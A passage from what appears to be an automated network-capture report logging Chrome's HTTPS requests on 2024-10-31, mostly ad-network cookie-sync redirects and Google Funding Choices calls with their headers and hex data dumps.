                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC774OUTGET /ju/cs/google?google_gid=CAESEI1qM-uapk6ijqCEkmvquJE&google_cver=1&google_push=AXcoOmSt9V-XvEosgwdO7hh7p0jmvZETv7AYYur3PP_0VA1kMD3uehc9zWkhZYvPw1d4cIrehwUweUItUNBJO3bWkfNSIgQy8JM9jQizFQ HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: gtrace.mediago.io
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://pagead2.googlesyndication.com/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC702INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: Content-Type
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                                                      Location: https://cm.g.doubleclick.net/pixel?google_nid=baidu_mediago&google_push=AXcoOmSt9V-XvEosgwdO7hh7p0jmvZETv7AYYur3PP_0VA1kMD3uehc9zWkhZYvPw1d4cIrehwUweUItUNBJO3bWkfNSIgQy8JM9jQizFQ&google_hm=22210ca7ce1ae6f72pgi3e00m2xmr4i6
                                                                                                                                                                                                                                                                                                                      Set-Cookie: __mguid_=22210ca7ce1ae6f72pgi3e00m2xmr4i6; Path=/; Domain=mediago.io; Max-Age=31536000; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:35 GMT
                                                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC8INData Raw: 72 65 64 69 72 65 63 74
                                                                                                                                                                                                                                                                                                                      Data Ascii: redirect


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      61192.168.2.44988952.16.92.154437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC769OUTGET /sync/adx?google_gid=CAESEEmQdMAM7E0W-DH6rhDiIxs&google_cver=1&google_push=AXcoOmSC5XzHMFryMzDkGxghutUO-mvFIJ78eTpuHDkgVH0JaQqClGaoWQeMEbZOwXl-_6VPMlKnpXxaJBwSkNZeCT74kzVwrTTEcm0 HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: pr-bh.ybp.yahoo.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://pagead2.googlesyndication.com/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC992INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:35 GMT
                                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Location: https://cm.g.doubleclick.net/pixel?google_nid=yahoo&google_push=AXcoOmSC5XzHMFryMzDkGxghutUO-mvFIJ78eTpuHDkgVH0JaQqClGaoWQeMEbZOwXl-_6VPMlKnpXxaJBwSkNZeCT74kzVwrTTEcm0&google_hm=eS15MDF1d0VSRTJwR3VpcERhbjZhVkN6U2FPbHdJd0xjb35B
                                                                                                                                                                                                                                                                                                                      Age: 0
                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                      Server: ATS
                                                                                                                                                                                                                                                                                                                      Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only"
                                                                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: sandbox; default-src 'self'; script-src 'none'; object-src 'none'; report-uri http://csp.yahoo.com/beacon/csp?src=generic
                                                                                                                                                                                                                                                                                                                      Set-Cookie: A3=d=AQABBDfKI2cCEEuI4dM8tJrIE5Rq5AWZyWAFEgEBAQEbJWctZwAAAAAA_eMAAA&S=AQAAAlc6jo4EtfQl0gBYx_awZn4; Expires=Sat, 1 Nov 2025 00:19:35 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=None; Secure; HttpOnly


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      62192.168.2.44990835.190.0.664437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC776OUTGET /google_pixel?google_gid=CAESEL2a7VS9IX-35Rzq52wUduA&google_cver=1&google_push=AXcoOmSrY7ICbKSMUirrf7SY7fPPWmw6Wx0t2MDX6BAA8aQDy1xy3RAKRzdLj7nTAXJsX4R08bXl2xtQtgoiufKBt9jpDiLgb0-rFvw HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: ads.travelaudience.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://pagead2.googlesyndication.com/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC800INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                      Server: nginx/1.21.6
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:35 GMT
                                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                                      Location: https://cm.g.doubleclick.net/pixel?google_nid=ta&google_hm=Fyu-5GbPRWQ6ZIpuIUpEuw&google_push=AXcoOmSrY7ICbKSMUirrf7SY7fPPWmw6Wx0t2MDX6BAA8aQDy1xy3RAKRzdLj7nTAXJsX4R08bXl2xtQtgoiufKBt9jpDiLgb0-rFvw
                                                                                                                                                                                                                                                                                                                      Set-Cookie: _tracker=%7B%22UUID%22%3A%22172BBEE4-66CF-4564-3A64-8A6E214A44BB%22%7D; Path=/; Domain=travelaudience.com; Expires=Mon, 01 Dec 2025 18:19:35 GMT; Max-Age=34214399; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                      X-Engine-Version: 0.0.0
                                                                                                                                                                                                                                                                                                                      X-Host: tde-deliveryengine-production-7dc4dc4684-8kzvb
                                                                                                                                                                                                                                                                                                                      P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR LAW CUR DEV PSA PSD IVA OUR BUS UNI COM NAV INT CNT LOC"
                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      63192.168.2.449915142.250.185.1424437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC1147OUTGET /f/AGSKWxVliFzt__e0MUU_SOrGx-lhlS6uQAPdw7fuvmC9ZOEsgVNDhFt6QsFFNlaOQwy5PSsxhxcDWnH1x8vkCo4uTDzz2qaGDiiWUxEb4DdVXaVIkxYLejIwjKuC0DHCYaFx6xUnkqAxgw==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzMwMzk4NzczLDk4NTAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzcsNiwxNV0sbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsMV0sImh0dHBzOi8vdHJrc3lsbi5uZXQvRXJyb3IiLG51bGwsW1s4LCJZc2dPT2N0dWtySSJdLFs5LCJlbi1VUyJdLFsxOSwiMiJdLFsxNywiWzBdIl0sWzE4LCJbW1sxXV1dIl0sWzIsIltudWxsLFtudWxsLDEsWzE3MzAzOTg3NzQsMjY1MzU5MDAwXV1dIl1dXQ HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                      Referer: https://trksyln.net/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:36 UTC1936INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:36 GMT
                                                                                                                                                                                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-BfmbqXwZyNLK0XG1RsOwSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorServingWebSwitchboardHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                      reporting-endpoints: default="/_/ContributorServingWebSwitchboardHttp/web-reports?context=eJzjytDikmLw1JBikPj6kkkLiJ3SZ7CGAHHrzXOs04E46d951hIgdte6yOoPxIYKl1idgdix6BKrJxCr9lxiNQfi--susT4H4iKJK6wtQHy76QrrYyBm-HqFlQOIhbg5dkzp38kmsOPlE2kljaT8wvjk_LySosyk0pL8orTktNTi1KKy1KJ4IwMjE0MDYwM9A4P4AgMAQfc_iA"
                                                                                                                                                                                                                                                                                                                      Server: ESF
                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:36 UTC1936INData Raw: 62 39 38 0d 0a 69 66 20 28 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 2e 66 63 4b 65 72 6e 65 6c 4d 61 6e 61 67 65 72 2e 72 75 6e 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 29 20 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 76 61 72 20 6a 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 3d 5f 2e 74 28 61 29 7d 3b 5f 2e 76 28 6a 44 2c 5f 2e
                                                                                                                                                                                                                                                                                                                      Data Ascii: b98if (typeof __googlefc.fcKernelManager.run === 'function') {"use strict";this.default_ContributorServingResponseClientJs=this.default_ContributorServingResponseClientJs||{};(function(_){var window=this;try{var jD=function(a){this.l=_.t(a)};_.v(jD,_.
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:36 UTC1039INData Raw: 5c 2f 66 75 6e 64 69 6e 67 63 68 6f 69 63 65 73 6d 65 73 73 61 67 65 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 5c 2f 66 5c 2f 41 47 53 4b 57 78 56 49 33 66 69 4a 2d 33 71 6d 50 5a 65 78 50 69 62 33 51 66 71 63 57 5f 34 47 70 62 4b 37 67 42 5a 42 76 43 43 72 64 35 5f 70 4b 53 46 64 71 66 30 6f 37 42 7a 36 68 4a 6a 62 36 62 4b 4c 32 53 44 6d 38 72 38 4b 2d 58 68 45 39 38 43 76 68 71 45 44 68 67 75 62 50 54 44 55 69 65 75 6b 59 44 30 4d 51 72 5a 66 75 46 39 71 5f 6b 69 4c 39 49 67 4d 55 35 73 4a 45 6f 46 44 5a 63 36 78 46 49 36 4f 72 41 45 7a 37 51 5c 5c 5c 5c 75 30 30 33 64 5c 5c 5c 5c 75 30 30 33 64 5c 5c 5c 78 32 32 5c 78 35 64 2c 5c 78 35 62 6e 75 6c 6c 2c 5c 78 35 62 37 2c 36 2c 31 35 5c 78 35 64 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c
                                                                                                                                                                                                                                                                                                                      Data Ascii: \/fundingchoicesmessages.google.com\/f\/AGSKWxVI3fiJ-3qmPZexPib3QfqcW_4GpbK7gBZBvCCrd5_pKSFdqf0o7Bz6hJjb6bKL2SDm8r8K-XhE98CvhqEDhgubPTDUieukYD0MQrZfuF9q_kiL9IgMU5sJEoFDZc6xFI6OrAEz7Q\\\\u003d\\\\u003d\\\x22\x5d,\x5bnull,\x5b7,6,15\x5d,null,null,null,null,
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      64192.168.2.44990951.89.9.2524437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC781OUTGET /match/?int_id=19&redir=1&google_gid=CAESEKcM364RUx5QMSs2V2LwRf8&google_cver=1&google_push=AXcoOmSBEqLcMQ1_a7fW7NcT2Iei-MG31IkeZEJ4zsIXZrw5PAIP7aNgsrC8sU8h46pHu40uiZnbXPrhr6kfd4hGeSk-YKS5ry9iw6eT HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: onetag-sys.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://pagead2.googlesyndication.com/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:36 UTC484INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                      p3p: CP='CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
                                                                                                                                                                                                                                                                                                                      cache-control: no-transform, no-cache
                                                                                                                                                                                                                                                                                                                      location: https://cm.g.doubleclick.net/pixel?google_nid=one_tag&google_hm=&google_push=AXcoOmSBEqLcMQ1_a7fW7NcT2Iei-MG31IkeZEJ4zsIXZrw5PAIP7aNgsrC8sU8h46pHu40uiZnbXPrhr6kfd4hGeSk-YKS5ry9iw6eT
                                                                                                                                                                                                                                                                                                                      content-length: 0
                                                                                                                                                                                                                                                                                                                      strict-transport-security: max-age=15552000
                                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=900, h3-29=":443"; ma=900
                                                                                                                                                                                                                                                                                                                      connection: close


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      65192.168.2.449914142.250.185.1424437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC845OUTPOST /el/AGSKWxVBBzvZ69xO4jG5wX53WFu8HNxIHAgKipnIrao5nJty4CejpOan7tW1s_7eFn4m2MgODKcxGKt7pGBCu4j4FSjhBLIWfJJLo5rj0s2f3HlOOJoHwb6I-HPmer1qRPiMUaABDqvU5g== HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      Content-Length: 150
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                      Origin: https://trksyln.net
                                                                                                                                                                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                      Referer: https://trksyln.net/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC150OUTData Raw: 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 31 37 33 30 33 39 38 37 37 33 39 38 32 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 31 2c 31 30 30 2c 22 74 72 6b 73 79 6c 6e 2e 6e 65 74 22 2c 22 74 72 6b 73 79 6c 6e 2e 6e 65 74 22 2c 33 5d 5d 5d
                                                                                                                                                                                                                                                                                                                      Data Ascii: [null,null,null,null,null,null,null,null,1730398773982,null,null,null,null,null,null,null,null,null,null,null,[[1,100,"trksyln.net","trksyln.net",3]]]
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:36 UTC1861INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                                                                                                                                      Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://trksyln.net
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:36 GMT
                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorLoggingHttp/cspreport
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-i0FJ7K9ySqKYT9Htm906nQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorLoggingHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorLoggingHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                                      reporting-endpoints: default="/_/ContributorLoggingHttp/web-reports?context=eJzjUtDikmII1JBicEqfwRoCxO5aF1n9gZjh6xVWDiAW4ubYMaV_J5tAx789PEouSfmF8cn5eSWpeSW6iSnFuiB2UWZSaUl-EQo7tQykIic_PT0zLz3eyMDIxNDA2EDPwDi-wAAA8NMoFg"
                                                                                                                                                                                                                                                                                                                      Server: ESF
                                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      66192.168.2.44992054.170.20.2054437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:36 UTC814OUTGET /cookie-sync/adx?google_gid=CAESENLpOVFDHsC-VfNLaLRul-w&google_cver=1&google_push=AXcoOmRCFB4RRBFgylxbOFqFBPjZeDvCs7GKRvkfHQCCMWA8xyYRxGIyqTtHvnHsOhTFPNWwGBpagrnbCD1tYp2Fb3NXZOXDekx5&_bee_ppp=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: match.prod.bidr.io
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
